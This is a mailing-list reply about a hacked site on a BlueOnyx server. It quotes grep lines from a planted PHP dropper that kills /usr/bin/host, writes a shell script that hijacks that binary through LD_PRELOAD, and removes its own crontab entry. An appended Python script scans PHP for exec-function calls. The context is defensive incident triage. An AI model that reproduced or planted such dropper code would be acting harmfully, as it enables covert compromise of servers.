[BlueOnyx:17918] Re: 5106R cfsadmin load issue
Michael Stauber
mstauber at blueonyx.it
Sat Jun 27 12:49:31 -05 2015
Hi Gerald,
> OK here is the hack
> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@system("killall
> -9 ".basename("*/usr/bin/host*"));
> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$f =
> fopen("/usr/bin/host", "rb");
> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$HBN=basename("
> */usr/bin/host*");
> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@file_put_contents("1.sh",
> "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9
> $HBN;export AU='".$AU."'\nexport
> LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep
> -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
Nice catch. :o)
But I had to say it: The default security settings of PHP do not allow
PHP scripts to use system() calls. Apparently it was allowed for this
site and that allowed the scripts to do their malicious job.
Might be a good idea to disallow system() calls again on that box.
--
With best regards
Michael Stauber
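Two checks a defender would want after reading this thread, as an added example (not code from the thread or from BlueOnyx): an audit of a php.ini-style text for the process-spawning functions that belong in `disable_functions`, and a scan of PHP source for calls to those functions, which is how a dropper like the quoted `system.php` would show up. The ini snippets and the PHP sample are constructed; the function list is the standard set of PHP execution functions.

```python
"""Audit PHP configuration and source for process-spawning functions.

Added example for the BlueOnyx thread on a compromised site; not project code.
The ini snippets and PHP sample below are constructed for illustration.
"""
import re

# PHP functions that hand a string to a shell or spawn a process.
EXEC_FUNCTIONS = frozenset({
    "system", "exec", "shell_exec", "passthru", "popen", "proc_open", "pcntl_exec",
})

# Matches a call such as system( or @shell_exec ( ; \b keeps "mysystem(" out.
CALL_RE = re.compile(r"\b(" + "|".join(sorted(EXEC_FUNCTIONS)) + r")\s*\(", re.IGNORECASE)


def parse_disable_functions(ini_text: str) -> set[str]:
    """Return the functions named by the last effective disable_functions line."""
    disabled: set[str] = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop ini comments
        m = re.match(r"disable_functions\s*=\s*(.*)$", line, re.IGNORECASE)
        if m:
            value = m.group(1).strip().strip('"')
            # A later directive overrides an earlier one, as PHP itself does.
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def missing_exec_functions(ini_text: str) -> frozenset[str]:
    """Execution functions that the configuration still leaves callable."""
    return EXEC_FUNCTIONS - parse_disable_functions(ini_text)


def find_exec_calls(php_source: str) -> list[tuple[int, str]]:
    """Return (line_number, function_name) for each execution call in PHP source."""
    hits: list[tuple[int, str]] = []
    for n, line in enumerate(php_source.splitlines(), 1):
        for m in CALL_RE.finditer(line):
            hits.append((n, m.group(1).lower()))
    return hits


# Constructed: execution functions left enabled (the state the thread describes).
WEAK_INI = """
; site-level php.ini, constructed example
disable_functions =
"""

# Constructed: the hardened setting.
HARDENED_INI = """
; site-level php.ini, constructed example
disable_functions = system,exec,shell_exec,passthru,popen,proc_open,pcntl_exec
"""

# Constructed PHP sample; only lines 3 and 4 spawn a process.
SAMPLE_PHP = r'''<?php
$x = 1;
@system("id");           // constructed: shell call with error suppression
echo shell_exec("ls");   // constructed: shell call
$f = fopen("/tmp/x", "rb");
'''

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        missing = missing_exec_functions(ini)
        state = "OK" if not missing else "still enabled: " + ", ".join(sorted(missing))
        print(f"{label}: {state}")
    for line_no, func in find_exec_calls(SAMPLE_PHP):
        print(f"sample.php:{line_no}: {func}()")
```

The audit only sees the text it is given; on a real box, `php --ini` lists the configuration files actually loaded, and a per-site override (a PHP-FPM pool directive, a `.user.ini`, or a `php_admin_value` in the vhost) can differ from the global php.ini, so feed it the effective configuration for the site in question. The source scan is a triage aid for the web root, not proof of compromise on its own.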